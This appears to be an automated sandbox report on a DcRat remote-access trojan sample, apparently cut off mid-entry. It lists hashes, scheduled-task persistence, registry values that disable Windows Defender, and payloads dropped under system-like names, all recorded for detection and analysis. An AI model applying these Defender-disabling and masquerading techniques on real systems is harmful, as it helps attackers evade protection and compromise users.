Analysis
-
max time kernel
247s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 19:12
Static task
static1
Behavioral task
behavioral1
Sample
FunCheker.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
FunCheker.exe
Resource
win10v2004-20240709-en
General
-
Target
FunCheker.exe
-
Size
1.9MB
-
MD5
a69f81ab8922f56e786c95000e4ea238
-
SHA1
eec04e5776a155f4445260b46f8fa3b139ccedef
-
SHA256
c36b87352873121329f10440ce883510be4c7d829d6afe7ee28664b79cddfd8d
-
SHA512
de9a791be937925f0ab9d665e6282237f78b4b14f11e539bbcb9dd1ee95b0421a00ab841adb97ed3f41d3d92d94a569728edb486940afb690114bf825a42aeab
-
SSDEEP
49152:mIduhWrW/Si9FPOcS/up3M4vsEVXxQ4mxS5WDK:BuMr6zxSmp8Bi6I
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6108 schtasks.exe 5072 schtasks.exe 5852 schtasks.exe 3548 schtasks.exe 1356 schtasks.exe 3660 schtasks.exe 5204 schtasks.exe 5316 schtasks.exe 5856 schtasks.exe 4296 schtasks.exe 2820 schtasks.exe 4140 schtasks.exe 2148 schtasks.exe 5384 schtasks.exe 3660 schtasks.exe 1396 schtasks.exe 4780 schtasks.exe 704 schtasks.exe 2456 schtasks.exe 5312 schtasks.exe 5048 schtasks.exe 2976 schtasks.exe 5984 schtasks.exe 860 schtasks.exe 6104 schtasks.exe 2652 schtasks.exe 5940 schtasks.exe 5516 schtasks.exe 5296 schtasks.exe 5116 schtasks.exe 4160 schtasks.exe 4944 schtasks.exe 1940 schtasks.exe 5028 schtasks.exe 5916 schtasks.exe 2172 schtasks.exe 3984 schtasks.exe 5584 schtasks.exe 1528 schtasks.exe 2596 schtasks.exe 1232 schtasks.exe 1276 schtasks.exe 5192 schtasks.exe 5788 schtasks.exe 3980 schtasks.exe 1292 schtasks.exe 3916 schtasks.exe 4344 schtasks.exe 5372 schtasks.exe 5148 schtasks.exe 1984 schtasks.exe 5392 schtasks.exe 4388 schtasks.exe 4244 schtasks.exe 4508 schtasks.exe 5164 schtasks.exe 2284 schtasks.exe 1928 schtasks.exe 392 schtasks.exe 5684 schtasks.exe 2312 schtasks.exe 5024 schtasks.exe 2136 schtasks.exe 4576 schtasks.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4140 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1572 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1356 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5084 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3916 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 704 1396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5164 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5192 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5116 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3660 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2136 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5940 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4160 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2456 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5312 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5532 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5516 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1928 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5788 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5296 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5384 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 860 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3980 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5028 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4344 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4576 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5204 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5916 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4944 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1292 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4900 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5316 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5584 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1984 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6104 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6108 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5072 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1276 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5684 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5048 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 232 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5852 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5392 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5372 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4388 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 392 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1528 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4016 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2172 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1516 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5720 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5088 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 628 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3660 452 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4364 452 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe dcrat C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe dcrat behavioral2/memory/4244-37-0x0000000000DE0000-0x0000000001004000-memory.dmp dcrat -
Checks computer location settings 2 TTPs 39 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SppExtComObj.exeSppExtComObj.exeFunCheker.exeMicrasoft.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeFunCheker.exeMicrasoft.exeWmiPrvSE.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeMicrasoft.exeWScript.execomcommon.exeFunCheker.exeWScript.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeFunCheker.exeWScript.execomcommon.exeWmiPrvSE.exeWmiPrvSE.execomcommon.exeSppExtComObj.exeSppExtComObj.exeWmiPrvSE.exeWmiPrvSE.exeMicrasoft.exeSppExtComObj.exeWScript.exeSppExtComObj.exeSppExtComObj.exeWmiPrvSE.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation FunCheker.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Micrasoft.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation FunCheker.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Micrasoft.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Micrasoft.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation comcommon.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation FunCheker.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation FunCheker.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation comcommon.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation comcommon.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Micrasoft.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SppExtComObj.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WmiPrvSE.exe -
Executes dropped EXE 35 IoCs
Processes:
Micrasoft.execomcommon.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeMicrasoft.exeSppExtComObj.execomcommon.exeMicrasoft.exeSppExtComObj.exemsedge.execomcommon.exeMicrasoft.execomcommon.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exepid process 5116 Micrasoft.exe 4244 comcommon.exe 4380 SppExtComObj.exe 2236 SppExtComObj.exe 728 SppExtComObj.exe 1492 SppExtComObj.exe 1652 SppExtComObj.exe 1228 SppExtComObj.exe 1380 SppExtComObj.exe 1444 SppExtComObj.exe 1324 SppExtComObj.exe 4656 SppExtComObj.exe 5004 SppExtComObj.exe 5972 SppExtComObj.exe 1044 SppExtComObj.exe 5528 SppExtComObj.exe 6092 SppExtComObj.exe 5328 SppExtComObj.exe 5408 SppExtComObj.exe 1564 Micrasoft.exe 1684 SppExtComObj.exe 6108 comcommon.exe 5960 Micrasoft.exe 764 SppExtComObj.exe 5252 msedge.exe 4160 comcommon.exe 3996 Micrasoft.exe 932 comcommon.exe 6140 WmiPrvSE.exe 1952 WmiPrvSE.exe 2076 WmiPrvSE.exe 2068 WmiPrvSE.exe 3608 WmiPrvSE.exe 5888 WmiPrvSE.exe 5720 WmiPrvSE.exe -
Drops file in Program Files directory 10 IoCs
Processes:
comcommon.execomcommon.exedescription ioc process File created C:\Program Files\ModifiableWindowsApps\sihost.exe comcommon.exe File created C:\Program Files\Java\jre-1.8\winlogon.exe comcommon.exe File created C:\Program Files (x86)\MSBuild\winlogon.exe comcommon.exe File opened for modification C:\Program Files (x86)\MSBuild\winlogon.exe comcommon.exe File created C:\Program Files (x86)\MSBuild\cc11b995f2a76d comcommon.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe comcommon.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe comcommon.exe File created C:\Program Files\Java\jre-1.8\cc11b995f2a76d comcommon.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\24dbde2999530e comcommon.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6 comcommon.exe -
Drops file in Windows directory 10 IoCs
Processes:
comcommon.execomcommon.exedescription ioc process File opened for modification C:\Windows\ja-JP\msedge.exe comcommon.exe File created C:\Windows\it-IT\msedge.exe comcommon.exe File created C:\Windows\it-IT\61a52ddc9dd915 comcommon.exe File created C:\Windows\InputMethod\SHARED\conhost.exe comcommon.exe File created C:\Windows\InputMethod\SHARED\088424020bedd6 comcommon.exe File created C:\Windows\ja-JP\msedge.exe comcommon.exe File created C:\Windows\ja-JP\61a52ddc9dd915 comcommon.exe File created C:\Windows\diagnostics\system\IESecurity\msedge.exe comcommon.exe File created C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe comcommon.exe File created C:\Windows\Performance\WinSAT\DataStore\38384e6a620884 comcommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1944 timeout.exe 2872 timeout.exe 5044 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 32 IoCs
Processes:
SppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exemsedge.exeSppExtComObj.execomcommon.exeSppExtComObj.exeMicrasoft.exeMicrasoft.exeSppExtComObj.execomcommon.exeMicrasoft.exeWmiPrvSE.exeSppExtComObj.exeSppExtComObj.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.execomcommon.exeSppExtComObj.exeMicrasoft.exeSppExtComObj.exeSppExtComObj.exeWmiPrvSE.exeSppExtComObj.exeSppExtComObj.exeWmiPrvSE.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{03B65D90-6E45-4BD2-9E62-6DFEC28F04A9} msedge.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created 